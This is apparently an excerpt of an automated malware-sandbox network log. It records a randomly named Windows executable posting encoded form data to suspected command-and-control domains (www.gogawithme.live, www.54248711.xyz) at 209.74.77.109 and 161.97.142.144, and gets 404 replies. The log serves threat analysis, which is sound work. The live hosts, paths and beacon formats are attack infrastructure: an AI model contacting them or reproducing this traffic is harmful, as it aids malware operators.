                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.450012209.74.77.109803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:23.091801882 CET10715OUTPOST /6gtt/ HTTP/1.1
                                                                                                                    Host: www.gogawithme.live
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.gogawithme.live
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.gogawithme.live/6gtt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 4b 73 34 61 32 4f 52 30 45 43 37 56 67 4a 6a 58 4f 4d 78 52 48 70 75 35 54 37 49 57 64 4b 79 77 30 4f 73 68 5a 47 52 77 41 37 51 75 78 36 6a 48 31 72 33 65 39 64 49 36 41 63 48 76 57 71 71 6d 66 4e 4d 42 45 6a 33 6d 52 51 42 52 6c 58 59 50 7a 66 59 55 76 52 45 37 45 4d 34 69 49 47 2f 78 54 41 79 57 4d 61 49 57 59 75 34 44 79 53 5a 32 51 51 75 34 58 6d 44 46 4c 4c 6f 67 47 47 42 67 48 75 43 35 39 5a 64 37 31 69 41 62 54 64 4c 41 47 6f 53 76 65 6d 31 53 6e 74 53 34 44 69 74 75 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRKs4a2OR0EC7VgJjXOMxRHpu5T7IWdKyw0OshZGRwA7Qux6jH1r3e9dI6AcHvWqqmfNMBEj3mRQBRlXYPzfYUvRE7EM4iIG/xTAyWMaIWYu4DySZ2QQu4XmDFLLogGGBgHuC59Zd71iAbTdLAGoSvem1SntS4DituAgjVUr/o451HgKAW7AAE3d4RGSGdacjqAVGynPZA0uNz9lmUnVlaa787dliPz/hLg2EVTp0vQK/1IgQbcZP3IM/d6ik4ZbLfnX2t4TUJLYITp5eC4/9fMDYnwcAOJp4YJ+2bcjLlSJsiN//vDigL5rnSZZSwnj1WvyJjS7v0gNk/mHIBTtFv8+CJjOB4j6Xi5J3QmKhapzUCVF/NfIQYqdXu+ZwCjVgGu2I2wCeHbPpZ6qBH2fDVFB5uwfv5FG0RxS2AIP2/7iXWTfesW0PUn8l+WMlMRkAic3rTgdvA/VnEt/PbQDd+qn0XMncHomlxUrfON2rPzwegkuXB2r0XxSQq9P0wf2mA19GicAn2kjSaJMlGUZZF4hI5QnDJKYI9CXDkXTqk6nN5B2W89QvMJqD4/ius0QXmwvEwNokiTvi6GVusKFzAgoVoB8kG160U+HSGe6je6dbWvPJtd1iMRV6MyQxmEyZgSIFV6xF05sV22lo9PTbABbsY36201VeNmdMEpEPGY7wHVg/H8uAHzZSnXrWaQ0QMZviwv8DWxQKUb2ZP0zjr1YGIjkQlwqRi4eRWb7k2a6A02906HEEZWuMR+Ntf1sX1gTO2f6w3XvtXzlrmGmHNxwckVdUIVqzoUiew5/RvWcFmf75rU5WSBzaG8KN246W6Vm [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:59:24.374104023 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:24 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.450019209.74.77.109803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:25.759254932 CET349OUTGET /6gtt/?GzeXFT7=SGA0vAB7ljjiJZB705auu5nMqwjvdcjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbZvGne3nysZQrZ3blxXWxNHaQaYJ6iy4iy6k=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.gogawithme.live
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:59:27.115638018 CET548INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:26 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.450035161.97.142.144803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:32.620309114 CET604OUTPOST /jm2l/ HTTP/1.1
                                                                                                                    Host: www.54248711.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.54248711.xyz
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.54248711.xyz/jm2l/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 32 48 64 35 2f 36 4c 2b 4c 4e 76 64 32 42 51 73 4c 55 55 30 59 59 63 43 4c 4b 52 67 57 41 32 38 4a 67 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd2Hd5/6L+LNvd2BQsLUU0YYcCLKRgWA28Jg==
                                                                                                                    Nov 21, 2024 16:59:33.860104084 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:33 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cce1df-b96"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Nov 21, 2024 16:59:33.860119104 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.450040161.97.142.144803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:35.292800903 CET624OUTPOST /jm2l/ HTTP/1.1
                                                                                                                    Host: www.54248711.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.54248711.xyz
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.54248711.xyz/jm2l/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 34 78 57 4e 59 55 62 44 4c 31 53 76 4f 2f 31 2f 43 42 72 38 67 56 6d 46 41 74 4a 53 53 65 35 51 77 3d
                                                                                                                    Data Ascii: GzeXFT7=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKY4xWNYUbDL1SvO/1/CBr8gVmFAtJSSe5Qw=
                                                                                                                    Nov 21, 2024 16:59:36.573849916 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:36 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cce1df-b96"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Nov 21, 2024 16:59:36.573863983 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.450041161.97.142.144803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:37.958981991 CET10706OUTPOST /jm2l/ HTTP/1.1
                                                                                                                    Host: www.54248711.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.54248711.xyz
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.54248711.xyz/jm2l/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 31 6c 73 57 4d 51 41 35 32 38 30 46 49 6c 5a 53 6f 61 67 6a 65 64 53 70 52 49 35 31 4c 4e 52 47 44 35 35 77 54 77 71 70 35 69 2b 72 4e 35 4b 2b 65 41 5a 54 4d 52 68 69 42 67 38 50 56 64 72 2b 46 7a 44 34 51 69 42 4b 59 78 47 5a 46 73 47 6d 2f 30 30 68 32 4d 2b 4e 4c 50 4e 2b 47 73 73 58 7a 6f 33 54 34 31 75 7a 57 32 77 44 4f 6d 70 65 2b 42 73 39 48 75 76 78 6c 6f 47 35 38 6a 4b 4e 39 6e 79 39 32 30 53 48 58 46 76 55 61 6b 77 43 64 6f 52 63 68 50 45 56 75 6d 52 7a 4f 75 76 35 34 6f 41 6f 6c 46 2f 54 33 2b 70 6a 46 36 38 6a 70 46 48 47 70 73 4f 44 2b 45 6e 2f 4a 7a 58 51 35 36 72 44 31 49 6f 48 31 6b 42 42 65 36 7a 48 37 62 4f 72 55 75 77 6a 4a 4c 2b 59 56 47 72 6b 6e 35 61 77 53 54 37 71 49 50 42 45 71 52 51 53 73 72 47 58 55 64 4d 50 33 38 36 4f 49 4f 4a 71 6e 73 4c 67 4b 6b 54 6e 4a 38 75 77 63 4b 4e 49 48 2b 4d 53 6a 41 7a 73 31 6a 51 36 4a 59 58 6f 6e [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU1lsWMQA5280FIlZSoagjedSpRI51LNRGD55wTwqp5i+rN5K+eAZTMRhiBg8PVdr+FzD4QiBKYxGZFsGm/00h2M+NLPN+GssXzo3T41uzW2wDOmpe+Bs9HuvxloG58jKN9ny920SHXFvUakwCdoRchPEVumRzOuv54oAolF/T3+pjF68jpFHGpsOD+En/JzXQ56rD1IoH1kBBe6zH7bOrUuwjJL+YVGrkn5awST7qIPBEqRQSsrGXUdMP386OIOJqnsLgKkTnJ8uwcKNIH+MSjAzs1jQ6JYXonm33fg0gbn+Iz2OtlOx0j7oHkwm03AeZWQoxGYYKxlJY1S6aAqEbaBu+T1YrQ+yK52CkEUs+FpjLekMdhw42VJveC7DdJgGxs69xvQOHwWSGUwWLf8IKPb0CeHYvWYv9UgS/llSLrq3zgK4KI/5pQTjP5A0PYnAcI+/4sLipe6jS2jUojmlHUeaEeTn/ClQ241+VeeO+mtu2c/+JuzmT67qWyEyY8Zc5/5UKadFFB2CUSQ1A3okDKHIZQN22bhdQ6HywQNY14e3Vy26MkC2Hsp3srsXJGlU47XxetEmlj/AzK/pti/02at/Qv4TWUyh36bSVY90p6ECqXVWJ2rlYrLpLiNIcWYHjRxeOmMVi3TzzV6/2+bXbTvdZcT0kdouMIaOvYBGMZrcjtk3FvqkJqx6XEWPd69saBBih22G9nGzr7lbL2t0OdrZ+zqoPUZ1/cxiUejwm9aU+rY7EabCxFwpREEyQnUOugKHhonCnb7M6wkr7UmPHkKI8B3FnvrUOHFii9KIdRdacqqVHtSfPsupQf7OW9bNZp3ncTay2evr42Gug0sUcUdVgQMTnMyqUWHZ5a1b9JGgh3WM94734h6kom+Ehag+M3PCdGhD/OrSPGlbhD7e8HLuyxC42nE1GpXHsU/tFEREOeapexv+smR1GZ4GtlluRQkI [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:59:39.284393072 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:39 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cce1df-b96"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
